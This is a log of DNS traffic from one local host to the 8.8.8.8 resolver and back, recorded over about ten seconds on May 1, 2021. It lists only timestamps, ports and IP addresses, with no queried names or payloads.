May 1, 2021 06:01:51.647494078 CEST	52006	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.670178890 CEST	50989	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.676301003 CEST	53	49160	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.688473940 CEST	59034	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.698214054 CEST	53	52006	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.707031012 CEST	54489	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.718713045 CEST	53	50989	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.736999989 CEST	53	59034	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.745240927 CEST	64203	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.755532980 CEST	53	54489	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.793706894 CEST	53	64203	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.837577105 CEST	53555	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.886123896 CEST	53	53555	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.889528990 CEST	60844	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.889561892 CEST	63917	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.938036919 CEST	53	60844	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.938059092 CEST	53	63917	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.962851048 CEST	49898	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.011326075 CEST	53	49898	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.039889097 CEST	49632	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.052942038 CEST	65361	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.090214968 CEST	65317	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.091310978 CEST	53	49632	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.104171038 CEST	51191	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.104319096 CEST	53	65361	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.116974115 CEST	57013	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.130970955 CEST	58745	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.140558004 CEST	53	65317	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.142018080 CEST	56440	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.154048920 CEST	61776	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.155714989 CEST	53	51191	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.164864063 CEST	53928	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.165544033 CEST	53	57013	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.177084923 CEST	56711	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.179516077 CEST	53	58745	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.189516068 CEST	54305	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.190555096 CEST	53	56440	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.201400995 CEST	61669	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.202662945 CEST	53	61776	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.212357998 CEST	57336	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.213296890 CEST	53	53928	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.225651979 CEST	53	56711	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.232743025 CEST	64987	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.238213062 CEST	53	54305	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.245122910 CEST	60905	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.251101971 CEST	53	61669	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.257215977 CEST	65201	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.262083054 CEST	53	57336	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.270154953 CEST	58439	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.280306101 CEST	55876	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.285368919 CEST	53	64987	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.289578915 CEST	56994	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.298089027 CEST	53	60905	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.299040079 CEST	51800	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.307305098 CEST	58836	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.308010101 CEST	53	65201	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.313554049 CEST	52472	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.320741892 CEST	53	58439	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.321599007 CEST	51974	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.331703901 CEST	64199	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.332469940 CEST	53	55876	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.340260029 CEST	51731	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.340828896 CEST	53	56994	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.347508907 CEST	53	51800	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.350821972 CEST	55918	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.355828047 CEST	53	58836	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.362271070 CEST	53	52472	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.370158911 CEST	53	51974	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.377826929 CEST	62929	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.380259991 CEST	53	64199	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.388796091 CEST	53	51731	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.390878916 CEST	54988	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.399332047 CEST	53	55918	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.402352095 CEST	53644	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.416584015 CEST	62146	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.424602032 CEST	64238	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.426629066 CEST	53	62929	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.433701992 CEST	49834	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.439526081 CEST	53	54988	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.443931103 CEST	56295	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.453241110 CEST	51016	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.456334114 CEST	53	53644	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.468122005 CEST	53	62146	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.469060898 CEST	61443	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.475624084 CEST	53	64238	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.487596989 CEST	53	49834	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.497811079 CEST	53	56295	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.504411936 CEST	53	51016	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.519123077 CEST	53	61443	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.672152996 CEST	51621	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.684401989 CEST	54760	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.701277018 CEST	53786	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.712095022 CEST	54810	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.720834017 CEST	53	51621	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.721446991 CEST	52284	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.730547905 CEST	54986	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.733119965 CEST	53	54760	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.737654924 CEST	54532	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:52.749881029 CEST	53	53786	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.760617971 CEST	53	54810	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.772881031 CEST	53	52284	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.779103041 CEST	53	54986	8.8.8.8	192.168.2.3
May 1, 2021 06:01:52.786372900 CEST	53	54532	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.227194071 CEST	55946	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.230180025 CEST	59493	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.257064104 CEST	55399	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.272913933 CEST	49307	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.275490999 CEST	58059	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.276494980 CEST	60630	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.280175924 CEST	53	55946	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.280822992 CEST	58076	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.282815933 CEST	53	59493	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.299257040 CEST	61148	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.299295902 CEST	50031	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.299334049 CEST	61776	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.300626040 CEST	49810	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.300746918 CEST	56790	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.301353931 CEST	57358	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.306945086 CEST	53	55399	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.310797930 CEST	56508	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.314304113 CEST	56649	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.322593927 CEST	53	49307	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.325787067 CEST	53	58059	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.327800989 CEST	59907	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.329859018 CEST	53	60630	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.333574057 CEST	53	58076	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.337302923 CEST	53659	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.347774029 CEST	53	61148	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.347796917 CEST	53	61776	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.349056005 CEST	53	49810	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.349080086 CEST	53	56790	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.349807024 CEST	53	57358	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.350574017 CEST	53	50031	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.356494904 CEST	51838	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.362241030 CEST	53	56508	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.365612030 CEST	53	56649	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.369323015 CEST	63934	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.379213095 CEST	53	59907	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.385886908 CEST	53	53659	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.404964924 CEST	53	51838	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.418174028 CEST	53	63934	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.498616934 CEST	61716	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.548511982 CEST	53	61716	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.560102940 CEST	53650	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.609716892 CEST	53	53650	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.740871906 CEST	51615	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.768430948 CEST	64258	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.790599108 CEST	53	51615	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.820625067 CEST	52351	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.821410894 CEST	53	64258	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.870588064 CEST	53	52351	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.918452978 CEST	58310	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.932651043 CEST	64825	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.935188055 CEST	50655	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.940296888 CEST	61825	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.940896988 CEST	60502	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.965199947 CEST	63774	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.966901064 CEST	53	58310	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.981801987 CEST	53	64825	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.987519979 CEST	50330	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.988599062 CEST	53	50655	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.988893986 CEST	53	61825	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.992120981 CEST	53	60502	8.8.8.8	192.168.2.3
May 1, 2021 06:01:59.994805098 CEST	52798	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.998116016 CEST	59334	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:59.998532057 CEST	53352	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.002701998 CEST	55311	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.004621029 CEST	60424	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.008279085 CEST	61766	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.013710022 CEST	53	63774	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.018102884 CEST	53773	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.018193960 CEST	51728	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.018289089 CEST	62340	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.018378019 CEST	54513	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.018534899 CEST	59259	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.021858931 CEST	55550	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.024804115 CEST	56981	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.026518106 CEST	59678	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027308941 CEST	51481	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027380943 CEST	54127	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027416945 CEST	52330	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027508020 CEST	49629	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027520895 CEST	55940	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027669907 CEST	51482	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.027786016 CEST	56991	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.030113935 CEST	52620	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.030838013 CEST	65156	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.031636000 CEST	52769	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.033328056 CEST	55807	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.036068916 CEST	53	50330	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.045041084 CEST	53	52798	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.047771931 CEST	53	59334	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.048197985 CEST	53	53352	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.054296970 CEST	53	60424	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.055382967 CEST	53	55311	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.058101892 CEST	53	61766	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.068473101 CEST	53	54513	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.068496943 CEST	53	62340	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.070672989 CEST	53	51728	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.070688009 CEST	53	53773	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.071176052 CEST	53	59259	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.071571112 CEST	53	55550	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.074795008 CEST	62936	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.076508999 CEST	53	59678	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077014923 CEST	53	54127	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077305079 CEST	53	51481	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077532053 CEST	53	55940	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077554941 CEST	53	49629	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077598095 CEST	53	56991	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.077632904 CEST	53	56981	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.079858065 CEST	53	52620	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.079873085 CEST	53	52330	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.080426931 CEST	53	51482	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.080732107 CEST	53	65156	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.081381083 CEST	53	52769	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.083139896 CEST	53	55807	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.085299015 CEST	49974	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.105005980 CEST	54271	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.112215042 CEST	57075	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.121150970 CEST	56868	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.121794939 CEST	61133	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.123320103 CEST	53	62936	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.130985975 CEST	52943	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.133819103 CEST	53	49974	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.153563023 CEST	58020	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.156408072 CEST	53	54271	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.160708904 CEST	53	57075	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.170233965 CEST	53	61133	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.172779083 CEST	53	56868	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.179543972 CEST	53	52943	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.182908058 CEST	65206	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.185934067 CEST	54410	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.191328049 CEST	64349	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.200618982 CEST	64957	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.202056885 CEST	53	58020	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.212857008 CEST	53816	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.217063904 CEST	64565	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.231489897 CEST	53	65206	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.236567974 CEST	52546	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.237437963 CEST	53	54410	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.238061905 CEST	58170	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.242707968 CEST	53	64349	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.245307922 CEST	53032	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.251857996 CEST	53	64957	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.252121925 CEST	58441	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.261373043 CEST	53	53816	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.263988972 CEST	51780	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.265574932 CEST	53	64565	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.286832094 CEST	53	58170	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.287978888 CEST	53	52546	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.294994116 CEST	53	53032	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.295591116 CEST	57429	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.301469088 CEST	53	58441	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.313632011 CEST	53	51780	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.326631069 CEST	52826	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.333702087 CEST	52415	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.346931934 CEST	53	57429	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.350058079 CEST	58998	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.350100994 CEST	56325	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.351077080 CEST	61654	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.352375031 CEST	55102	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.355803967 CEST	52254	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.374419928 CEST	59150	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.376746893 CEST	53	52826	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.382309914 CEST	53	52415	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.398597002 CEST	53	56325	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.398617029 CEST	53	58998	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.399509907 CEST	53	61654	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.400883913 CEST	53	55102	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.407125950 CEST	53	52254	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.423038006 CEST	53	59150	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.547983885 CEST	62140	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.598351002 CEST	53	62140	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.917407036 CEST	61610	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.961968899 CEST	58710	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.964582920 CEST	53725	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.971348047 CEST	53	61610	8.8.8.8	192.168.2.3
May 1, 2021 06:02:00.971801996 CEST	54173	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.994539976 CEST	51144	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:00.995604992 CEST	65267	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.002919912 CEST	60291	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.010492086 CEST	53	58710	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.012414932 CEST	61283	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.012527943 CEST	63726	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.015928984 CEST	53	53725	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.018821001 CEST	52064	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.020354033 CEST	53	54173	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.039709091 CEST	50562	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.040966034 CEST	52717	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.043003082 CEST	53	51144	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.045917988 CEST	51958	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.050409079 CEST	50924	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.051382065 CEST	53	60291	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.060017109 CEST	63591	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.060839891 CEST	53	61283	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.060863018 CEST	53	63726	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.067282915 CEST	53	52064	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.088217020 CEST	53	50562	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.089412928 CEST	53	52717	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.093693018 CEST	55070	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.093955040 CEST	56207	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.099000931 CEST	53	51958	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.099467039 CEST	53	50924	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.100569010 CEST	60580	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.108551979 CEST	53	63591	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.117275953 CEST	50738	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.143640041 CEST	53	55070	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.146429062 CEST	53	56207	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.150629044 CEST	53	60580	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.158412933 CEST	51682	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.167260885 CEST	55354	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.167471886 CEST	53	50738	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.188431025 CEST	60696	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.188541889 CEST	56381	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.204489946 CEST	63266	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.206945896 CEST	53	51682	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.217196941 CEST	53662	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.218652964 CEST	53	55354	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.218887091 CEST	52429	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.219480991 CEST	50178	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.222340107 CEST	49388	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.223094940 CEST	53559	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.229902029 CEST	62801	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.239847898 CEST	53	56381	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.239890099 CEST	53	60696	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.253154993 CEST	53	63266	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.257855892 CEST	55736	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.262933016 CEST	58634	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.267339945 CEST	53	52429	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.267913103 CEST	53	50178	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.268662930 CEST	53	53662	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.270844936 CEST	53	49388	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.274362087 CEST	53	53559	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.281296015 CEST	53	62801	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.283740044 CEST	53172	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.288333893 CEST	51694	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.298888922 CEST	65059	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.301321983 CEST	64539	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.301485062 CEST	56209	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.304333925 CEST	57167	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.304560900 CEST	50499	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.307383060 CEST	61894	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.308016062 CEST	53	55736	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.309736013 CEST	59946	53	192.168.2.3	8.8.8.8
May 1, 2021 06:02:01.311507940 CEST	53	58634	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.333484888 CEST	53	53172	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.338258028 CEST	53	51694	8.8.8.8	192.168.2.3
May 1, 2021 06:02:01.348627090 CEST	53	65059	8.8.8.8	192.168.2.3
